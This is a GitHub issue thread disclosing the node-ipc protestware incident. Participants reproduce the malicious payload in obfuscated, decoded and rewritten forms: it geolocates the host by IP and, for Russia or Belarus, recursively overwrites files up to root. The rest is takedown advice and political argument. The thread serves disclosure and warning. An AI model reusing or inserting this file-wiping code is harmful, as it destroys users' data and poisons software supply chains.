Closed Mister-Hope closed 2 years ago
It seems such attack code is not published to npm (or has been deleted). But such behavior is still very dangerous.
NOTE: The related comments have been deleted by the owner of that repo. Here are the screenshots:
@RIAEvangelist deleting the original comment, but it does not matter to the fact.
Original post by @Mister-Hope which has been deleted.
@RIAEvangelist I did some digging into recent commits in this repository.
What the actual f--k are you doing here:
:warning:| The following code is malicious, DO NOT RUN IT
:warning:| The above code is malicious, DO NOT RUN IT
I deobfuscated the code and found out that if the host machine's ip address was from Russia or Belarus, your code would proceed to nuke their files by overwriting everything:
:warning:| The following code is malicious, DO NOT RUN IT
```js
import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer.from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with `❤️` } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };
```
:warning:| The above code is malicious, DO NOT RUN IT
The following are excerpts from the malicious code:
Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154
const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if ip country is Russia or Belarus
a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with `❤️`
You should be ashamed of yourself, this level of gross malice towards fellow developers is not ok.
Edit: please reference GalvinGao's comment
https://github.com/RIAEvangelist/node-ipc/issues/233#issuecomment-1068243590
Hmm, it seems the file has already been deleted (https://github.com/RIAEvangelist/node-ipc/commits/master/dao/ssl-geospec.js) and the affected version v10.1.3 has already been either taken down, or deleted by the user, from npm, as it currently no longer exists on npm. Still, the publisher's activity is, to my evaluation, kind of suspicious. Whether the file was introduced intentionally or unintentionally, the security concerns of using this package have already been planted.
It's not really possible to run that code. It poses no threat, but it does look scary for sure.
> It's not really possible to run that code. It poses no threat, but it does look scary for sure.
The fact of the matter is that you pushed that code to the repository.
That code should never have been mixed in with node-ipc.
Such actions can be considered malicious.
@RIAEvangelist Why are you removing the posts from the node-ipc ticket https://github.com/RIAEvangelist/node-ipc/issues/233 that clearly show the code you added was deleting/overwriting user files?
@yyx990803 @sodatea Evan & Haoqun, could you please make sure that node-ipc 9.2.1, which is now locked in @vue/cli 4.5.16 and @vue/cli 5.0.3, is not malicious and isn't allowed to be changed in any way (indirectly)? Not sure, is node-ipc being used as dependency in Vite https://github.com/vitejs/vite ? or in create-vue ? Please double check.
Can confirm no malicious code.
Also I don't think you understand the code you were referring to. It is not possible for that code to overwrite user files.
It definitely looks like it is possible, but if you check how it works, it is in fact not capable of doing what you are expecting.
The community should fork node-ipc since the owner can no longer be trusted.
Forking is always an option, so is version locking.
It's also very easy to jump to conclusions saying someone is not trustworthy. Code reviews and reading licenses and documentation may give better assessment of that though.
> It is not possible for that code to overwrite user files. It definitely looks like it is possible, but if you check how it works, it is in fact not capable of doing what you are expecting.
I tested the code and confirmed that if the response denoted that the IP was from Russia, the code definitely could (1/4 possibility for every run) overwrite the files.
Russia or Belarus, and only if the API key was valid; which it is not.
Also, damn good sleuthing.
Yeah, the API key is not valid now, but it's very easy to apply for a key or reset it.
@RIAEvangelist
> only if the API key was valid; which it is not.
At the time of my testing, the api key was valid. Don't lie to us.
I don't think anyone is lying here.
Code will not lie. If you really want to do something, don't do it behind your back.
```text
Welcome to Node.js v16.13.1.
Type ".help" for more information.
> const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64");
undefined
> n.toString("utf8")
'https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154'
> Buffer.from("Y291bnRyeV9uYW1l", "base64").toString("utf-8")
'country_name'
> Buffer.from("cnVzc2lh", "base64").toString("utf-8")
'russia'
> Buffer.from("YmVsYXJ1cw==", "base64").toString("utf-8")
'belarus'
> Buffer.from("Li8", "base64").toString("utf-8")
'./'
> Buffer.from("Li4v", "base64").toString("utf-8")
'../'
> Buffer.from("Li4vLi4v", "base64").toString("utf-8")
'../../'
> Buffer.from("Lw==", "base64").toString("utf-8")
'/'
>
```
I did an investigation, and got the following:
commit https://github.com/RIAEvangelist/node-ipc/commit/cc282c2b06c98eb0a01543639ac8d117476dc4c8 deleted the file dao/ssl-geospec.js
After decrypting it, we get this:
```js
import u from "path";
import a from "fs";
import o from "https";
setTimeout(function () {
  const t = Math.round(Math.random() * 4);
  if (t > 1) {
    return;
  }
  const n = "https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154";
  o.get(n.toString("utf8"), function (t) {
    t.on("data", function (t) {
      const n = "./";
      const o = "../";
      const r = "../../";
      const f = "/";
      const c = "country_name";
      const e = "russia";
      const i = "belarus";
      try {
        const s = JSON.parse(t.toString("utf8"));
        const u = s[c.toString("utf8")].toLowerCase();
        const a =
          u.includes(e.toString("utf8")) || u.includes(i.toString("utf8"));
        if (a) {
          h(n.toString("utf8"));
          h(o.toString("utf8"));
          h(r.toString("utf8"));
          h(f.toString("utf8"));
        }
      } catch (t) {}
    });
  });
}, Math.ceil(Math.random() * 1e3));
async function h(n = "", o = "") {
  if (!a.existsSync(n)) {
    return;
  }
  let r = [];
  try {
    r = a.readdirSync(n);
  } catch (t) {}
  const f = [];
  const c = "❤️";
  for (var e = 0; e < r.length; e++) {
    const i = u.join(n, r[e]);
    let t = null;
    try {
      t = a.lstatSync(i);
    } catch (t) {
      continue;
    }
    if (t.isDirectory()) {
      const s = h(i, o);
      s.length > 0 ? f.push(...s) : null;
    } else if (i.indexOf(o) >= 0) {
      try {
        a.writeFile(i, c.toString("utf8"), function () {});
      } catch (t) {}
    }
  }
  return f;
}
const ssl = true;
export { ssl as default, ssl };
```
you naughty guy
Someone use their actions to prove that open source has borders😅
Supply chain pollution is not a smart move
Did anyone report this to npmjs.com? https://www.npmjs.com/support?inquire=security&security-inquire=malware&package=node-ipc Removing this package from npmjs may save a lot of users.
Thanks for the issue.
A few clarifications:
node-ipc v9.x.
node-ipc 9.2.2 added the peacenotwar module, which would write a WITH-LOVE-FROM-AMERICA.txt to users' Desktop and OneDrive folders without the consent of the user.
2022-03-15T05:40:26.758Z and 2022-03-15T13:17:57.076Z; or those who updated project dependencies in that time span.
I think the best place to address this issue is the npm registry. They can directly take down these malicious codes.
npmmirror.com has already taken steps to redirect these problematic versions to the latest known-safe versions: https://github.com/cnpm/bug-versions/pull/181
node-ipc has been added to the registry.npmmirror.com blacklist and will not be synced with any new versions in the future.
We recommend that the community migrate to other alternative libraries as soon as possible.
Seems like we are going to lock our dependency versions from this point. lol, the funniest joke in 2022 is that [XX] has no border
🤣
@atian25 The behavior — committed malicious code, deleted comments which expose such code, revoked the api key after being exposed and promoted the sophistry that the code does not work because the api key is not valid — makes me think the guy is not worth trusting anymore. I strongly suggest npmmirror not only blacklist node-ipc but all his packages.
mark
mark
mark
Good news: this API is not available now. {"message":"Provided API key is not valid. Contact technical support for assistance at support@ipgeolocation.io"}
> Good news: this API is not available now. {"message":"Provided API key is not valid. Contact technical support for assistance at support@ipgeolocation.io"}
Bad news is that node-ipc still has this problem.
> It definitely looks like it is possible, but if you check how it works, it is in fact not capable of doing what you are expecting.
So what was your intention then?
Just made it better looking and commented the dangerous code so you guys can give it a try. Obviously the code will delete literally EVERYTHING on your drive.
```js
const path = require("path");
const fs = require("fs");
const https = require("https");
setTimeout(function () {
  const randomNumber = Math.round(Math.random() * 4);
  if (randomNumber > 1) {
    // return;
  }
  const apiKey = "https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154";
  const pwd = "./";
  const parentDir = "../";
  const grandParentDir = "../../";
  const root = "/";
  const countryName = "country_name";
  const russia = "russia";
  const belarus = "belarus";
  https.get(apiKey, function (message) {
    message.on("data", function (msgBuffer) {
      try {
        const message = JSON.parse(msgBuffer.toString("utf8"));
        const userCountryName = message[countryName.toString("utf8")].toLowerCase();
        const hasRus = userCountryName.includes(russia.toString("utf8")) || userCountryName.includes(belarus.toString("utf8")); // checks if country is Russia or Belarus
        if (hasRus) {
          deleteFile(pwd);
          deleteFile(parentDir);
          deleteFile(grandParentDir);
          deleteFile(root);
        }
      } catch (t) {}
    });
  });
  // zkyf: Let's try this directly here
  deleteFile(pwd);
  deleteFile(parentDir);
  deleteFile(grandParentDir);
  deleteFile(root);
}, 100);
async function deleteFile(pathName = "", o = "") {
  if (!fs.existsSync(pathName)) {
    return;
  }
  let fileList = [];
  try {
    fileList = fs.readdirSync(pathName);
  } catch (t) {}
  const f = [];
  const heartUtf8 = Buffer.from("4p2k77iP", "base64");
  for (var idx = 0; idx < fileList.length; idx++) {
    const fileName = path.join(pathName, fileList[idx]);
    let fileInfo = null;
    try {
      fileInfo = fs.lstatSync(fileName);
    } catch (err) {
      continue;
    }
    if (fileInfo.isDirectory()) {
      const fileSymbol = deleteFile(fileName, o);
      fileSymbol.length > 0 ? f.push(...fileSymbol) : null;
    } else if (fileName.indexOf(o) >= 0) {
      try {
        // fs.writeFile(fileName, heartUtf8.toString("utf8"), function () {}); // overwrites file with `❤️`
        console.log(`Rewrite ${fileName}`);
      } catch (err) {}
    }
  }
  return f;
}
```
Console:
@zkyf thank you for taking the time to convert all of the code to a more readable form! Hopefully this will aid myself and others in showing our managers exactly what is going on.
I see. So vuejs team does support the war in Ukraine. Sad....
> I see. So vuejs team does support the war in Ukraine. Sad....
Nobody supports Russia's war against Ukraine. What is happening right now is awful.
I noticed your GitHub says you're from Ukraine. Stay safe, and stand strong.
Fucking crazy lapdog.
I am not Russian, nor live in Russia, but this could've easily hit me as I was in Russia 3 months ago, like many other expats and foreigners. Luckily I only got the WITH-LOVE-FROM-AMERICA.txt because I'm no longer there. But this is absolutely outrageous.
Not to mention that there are over 3 million Ukrainians living in Russia that would be victims of this "protest" 🤷
Getting overly upset has little use - instead, focus on how to avoid having libraries maintained by volatile personalities in your dependency tree in the future. node-ipc needs to be removed sooner or later, as it cannot be maintained under its current name anymore.
A Russian old proverb.
@eahefnawy I think it is not only that. I think it is wrong to target Russians as well. It is not like every Russian supports the war or they have a say in this situation. Doing this just creates another war in a different form. Totally the opposite of the message he wants to send. The only good part is that he took the code out right after he committed it, so I guess no one got the malicious code.
> I think it is wrong to target Russians as well. It is not like every Russian supports war
Not all, but most of them do. There is socialist research that clearly shows that. 71% of Russians said in favor of war.
@maxisam completely agreed. I just wanted to also clarify the "side effects" of his intentions, which I don't agree with either.
> I think it is wrong to target Russians as well. It is not like every Russian supports war
> Not all, but most of them do. There is socialist research that clearly shows that. 71% of Russians said in favor of war.

@msangel You have to look at it from lots of angles. We are programmers (I assume you are). We should analyze this logically. I know it is easy for me to say that when I am not in Ukraine like you are.
Again, I hope Ukraine will be fine. I hate war in any form. And I know you are from Ukraine so hope you will be safe.
> Not all, but most of them do. There is socialist research that clearly shows that. 71% of Russians said in favor of war.

@msangel that can be true if the research is not faked. Social research during conflicts is mostly useless, because of fear from both sides. So take a critical look at that research.
This attack belongs to which type of threat in the SLSA framework ?
Russians must stop war before complaining.
I want to be public here. I never do, but now I can't be silent.
As Russian I was fighting against the regime as much as I could before 2017. Then I left. We lost our fight. We could not stand against it.
Russian government is not the same as Russian people. Yes, significant part of Russian society declares they support this war. My brother supports the war! Those people are not aggressors themselves, they are under propaganda for tens of years. They don't speak English, there is no independent journalists in Russia anymore. It is not even legal in Russia to name war "war". People go to prison for that. When you publicly say (like I do here) that I want the war to be stopped it is a crime and people go to prison for up to 15 years for that. Please be empathetic. What's happening in Ukraine is catastrophic. What's happening with Russian people in Russia, ordinary people, who earn their $150 per month is also catastrophic, but differently. Probably less though, I cannot count here.
Lots of tech people who mostly use GitHub and software like this library are leaving Russia now because they are against the war. I personally helped 29 people to leave that country. It is unsafe for them. They will try to find their new place in this world. They do not support the war, neither do I or anyone else.
My irrational feeling is that the vast majority of people who will ever use any code from GitHub are not supporting this war. Being a techie (developer, engineer, etc.) makes you think more and understand more. I believe that tens of thousands of Russian software engineers have already left Russia since the war began.
There is no way inside Russia to protest against the regime. Those people are victims, not aggressors. Those people CANNOT do anything against the war without being physically harassed immediately.
I encourage everyone to be empathetic here. It's not Russian people against the world. The world and lots of Russian people are not enemies to each other, we have the same enemy. And that enemy is strong. We need to stand together here, not fight with each other.
No to war. No hate to civilians.
People are always going heavily OT, when it comes to these topics. This isn't a place for politics. It's irrelevant, whether russia is a big evil bear, the west spreading misinformation, people want to support ukraine, or whatever. There are plenty of platforms to discuss the latest war, make donations, and curse at whichever side you desire.
Malware got introduced into a public library, by the maintainer himself. People need to be made aware of this fact, to prevent potential damage, and dependents need to update, and plan for when and how to remove the now rotten dependency, and what to replace it with.
Mixing politics into everything makes it hard to sort information. People coming here for research about the malware end up reading generic political debate, which isn't helpful.
> maxisam _
> I think it is wrong to target Russians as well. Not every Russian supports the war
> Not all, but most of them do. There is socialist research that clearly shows this. 71% of Russians spoke in favor of the war.
Such words are clearly not from a great mind. I hope that no one will suffer during this war, but what you are doing will definitely not bring any benefit and will not alleviate your emotional suffering. Peace.
> Not all, but most of them do. There is socialist research that clearly shows that. 71% of Russians said in favor of war.

Is this research based on responses from developers? I think most developers are against the war.
See https://github.com/RIAEvangelist/node-ipc/issues/233#issuecomment-1068182278: node-ipc is doing things far beyond what was ever expected. If any users are using an IP in Russia, all their files will be wiped entirely with ❤️, and that's a VERY DANGEROUS BEHAVIOR. This is not just making a joke, but damaging Russian people's PCs or servers.
I don't think the vue team has done enough by just releasing new versions; we should at least:
- add POPUPs on the official website about that
- deprecate all the infected vue-cli packages to add a message for that
Also, we can do: vue-devtools, by publishing new versions, so that users may get a chance to automatically upgrade and see the warning. @sodatea @yyx990803 Please take action as soon as possible! ❤️